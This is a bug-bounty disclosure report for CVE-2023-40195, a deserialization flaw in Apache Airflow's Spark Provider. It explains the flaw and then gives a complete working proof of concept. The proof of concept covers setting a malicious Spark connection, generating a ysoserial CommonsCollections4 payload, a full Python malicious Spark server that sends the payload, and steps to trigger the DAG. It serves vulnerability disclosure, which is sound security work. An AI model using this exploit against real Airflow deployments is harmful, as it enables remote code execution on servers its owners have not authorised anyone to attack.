
Internet Bug Bounty: CVE-2023-40195: Apache Airflow Spark Provider Deserialization Vulnerability RCE

2023-08-29 17:31:46
happyhacking123
hackerone.com (report H1:2127968)

8.8 High — CVSS3
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

6.5 Medium — CVSS2
AV:N/AC:L/Au:S/C:P/I:P/A:P
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL

0.001 Low — EPSS
Percentile: 45.7%

In the Apache Airflow Spark Provider, once a malicious Spark server address has been configured through the Connections page of the Airflow UI, an attacker-controlled server can feed malicious deserialization data to the PySpark client and thereby achieve remote code execution (RCE) on the Airflow server.

## Vulnerability principle:

  1. Spark protocol background: the Spark protocol is built on RPC communication, and each RPC exchange is a serialization/deserialization round trip. An attacker who controls one endpoint can therefore invoke arbitrary Java methods through crafted deserialization data and achieve RCE.

  2. Deserialization attacks work in both directions: a malicious client can attack the server, and a malicious server can attack the client. In the Airflow scenario, PySpark is used as a client that connects to the Spark server through the Spark Provider, so an attacker only needs to construct a malicious server to attack Airflow’s Spark client.

The command that triggers the deserialization is as follows:
spark-submit --master spark://evil_ip:port
An attacker can therefore configure a malicious IP and port through the Connections page of the Airflow UI; when Airflow executes the above command, the deserialization is triggered.
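To make the mapping concrete, here is a minimal sketch (not the provider's actual code) of how the UI-configured connection ends up as the --master argument of spark-submit; spark_default is the SparkSubmitOperator's default connection id:

from airflow.hooks.base import BaseHook

# Resolve the connection that was configured through the Airflow UI.
conn = BaseHook.get_connection("spark_default")

# Host and port become the --master argument of spark-submit.
master = "%s:%s" % (conn.host, conn.port)   # e.g. spark://172.31.76.174:8888
cmd = ["spark-submit", "--master", master, "--name", "arrow-spark", "/tmp/file"]
print(" ".join(cmd))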

## Vulnerability exploitation process:

  1. Create a new ‘Spark’ connection named ‘spark_default’ and configure the Host and Port parameters:
    Host: spark://172.31.76.174
    Port: 8888

#172.31.76.174 is the attacker-controlled malicious Spark server address (the same connection can also be created programmatically; see the sketch after the screenshots).

{F2648714}

{F2648715}
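For completeness, a minimal sketch of creating the same connection without the UI, directly through Airflow's ORM (assumes an Airflow 2.x environment; the values mirror the PoC above):

from airflow.models import Connection
from airflow.utils.session import create_session

# Programmatic equivalent of filling in the Connections form in the UI.
conn = Connection(
    conn_id="spark_default",
    conn_type="spark",
    host="spark://172.31.76.174",   # attacker-controlled Spark server
    port=8888,
)
with create_session() as session:
    session.add(conn)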

  2. The attacker generates the malicious serialized data (exp.der) with the deserialization tool ysoserial.
    Tool URL: https://github.com/frohoff/ysoserial

The attacker locally executes the following command:
"C:\Program Files\Java\jre1.8.0_361\bin\java" -jar ysoserial.jar CommonsCollections4 "touch /tmp/thisisRCE" > exp.der

#touch /tmp/thisisRCE is the malicious command to be executed on Airflow.

{F2648716}
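As a quick sanity check (illustrative, not part of the original report), the generated file should be a raw Java serialization stream, which always begins with the magic bytes 0xACED followed by stream version 0x0005:

import struct

# Java object serialization streams start with STREAM_MAGIC and STREAM_VERSION.
with open("exp.der", "rb") as f:
    magic, version = struct.unpack(">HH", f.read(4))

assert (magic, version) == (0xACED, 0x0005), "not a Java serialization stream"
print("exp.der looks like a Java serialization stream")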

  3. The attacker starts the malicious Spark server locally (evil_spark_server.py, listed below) and specifies the malicious serialized payload to be transmitted:
    python2 evil_spark_server.py 8888 exp.der

{F2648717}

  4. Enter the DAGs menu, start the example_spark_operator DAG, and select “Trigger DAG w/ config”:
    http://localhost:8080/trigger?dag_id=example_spark_operator

{F2648718}
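The same run can also be triggered without the UI through Airflow's stable REST API (a sketch; host and basic-auth credentials are placeholder assumptions):

import requests

# POST /api/v1/dags/{dag_id}/dagRuns creates a new DAG run (Airflow 2.x stable API).
resp = requests.post(
    "http://localhost:8080/api/v1/dags/example_spark_operator/dagRuns",
    auth=("airflow", "airflow"),   # placeholder credentials
    json={"conf": {}},
)
print(resp.status_code, resp.json())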

  5. The final command executed by Airflow is as follows:

spark-submit --master spark://172.31.76.174:8888 --name arrow-spark /tmp/file

The task log and the server view show that the arbitrary command was executed successfully.

{F2648719}

The malicious server successfully accepted the connection and sent the malicious payload.

{F2648720}

The malicious command was successfully executed on the Airflow worker server.

{F2648722}
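A trivial check on the worker confirms that the gadget chain ran (illustrative; the path comes from the ysoserial command above):

import os

# The CommonsCollections4 payload executed `touch /tmp/thisisRCE`.
print(os.path.exists("/tmp/thisisRCE"))   # True after successful exploitation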

evil_spark_server.py

#!/usr/bin/python
# Malicious Spark "server" (Python 2): for every RPC request received, it
# replies with an RpcResponse frame whose body is the attacker-supplied
# Java serialization payload (e.g. exp.der generated by ysoserial).
import os
import sys
import struct

from SocketServer import BaseRequestHandler, ThreadingTCPServer

class EchoHandler(BaseRequestHandler):
    def handle(self):
        print 'Got connection from %s' % (str(self.client_address))
        while True:
            msg = self.request.recv(8192)
            print msg
            if not msg:
                break
            if len(msg) > 16:
                print "Send msg>>>"
                # Bytes 9..16 of the client's RpcRequest frame carry the
                # 8-byte request id; the response must echo it back.
                self.request.send(build_msg(msg[9:17]))

def build_msg(request_id):
    # Spark RPC frame layout:
    #   8-byte frame length (includes itself) | 1-byte message type
    #   | 8-byte request id | 4-byte body length | body
    # so the header is 8 + 1 + 8 + 4 = 21 bytes; type 0x04 = RpcResponse.
    payloadObj = open(sys.argv[2], 'rb').read()
    msg_type = '\x04'
    head_length = 21
    msg = struct.pack('>Q', len(payloadObj) + head_length) + msg_type + request_id
    msg += struct.pack('>I', len(payloadObj)) + payloadObj
    return msg

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print 'Usage: python %s <port> </path/to/payload>' % os.path.basename(sys.argv[0])
        sys.exit()
    serv = ThreadingTCPServer(('0.0.0.0', int(sys.argv[1])), EchoHandler)
    print "Server listening on 0.0.0.0:%s" % (sys.argv[1])
    serv.serve_forever()

DAG Demo (example_spark.py):

from datetime import datetime

from airflow.models import DAG
from airflow.providers.apache.spark.operators.spark_jdbc import SparkJDBCOperator
from airflow.providers.apache.spark.operators.spark_sql import SparkSqlOperator
from airflow.providers.apache.spark.operators.spark_submit import SparkSubmitOperator

with DAG(
    dag_id='example_spark_operator',
    schedule_interval=None,
    start_date=datetime(2021, 1, 1),
    catchup=False,
    tags=['example'],
) as dag:
    # [START howto_operator_spark_submit]
    submit_job = SparkSubmitOperator(
        application="/tmp/file", task_id="submit_job"
    )
    # [END howto_operator_spark_submit]

    # [START howto_operator_spark_jdbc]
    jdbc_to_spark_job = SparkJDBCOperator(
        cmd_type='jdbc_to_spark',
        jdbc_table="foo",
        spark_jars="${SPARK_HOME}/jars/postgresql-42.2.12.jar",
        jdbc_driver="org.postgresql.Driver",
        metastore_table="bar",
        save_mode="overwrite",
        save_format="JSON",
        task_id="jdbc_to_spark_job",
    )

    spark_to_jdbc_job = SparkJDBCOperator(
        cmd_type='spark_to_jdbc',
        jdbc_table="foo",
        spark_jars="${SPARK_HOME}/jars/postgresql-42.2.12.jar",
        jdbc_driver="org.postgresql.Driver",
        metastore_table="bar",
        save_mode="append",
        task_id="spark_to_jdbc_job",
    )
    # [END howto_operator_spark_jdbc]

    # [START howto_operator_spark_sql]
    sql_job = SparkSqlOperator(sql="SELECT * FROM bar", master="local", task_id="sql_job")
    # [END howto_operator_spark_sql]

## Impact

Remote code execution (RCE) on the Airflow server.
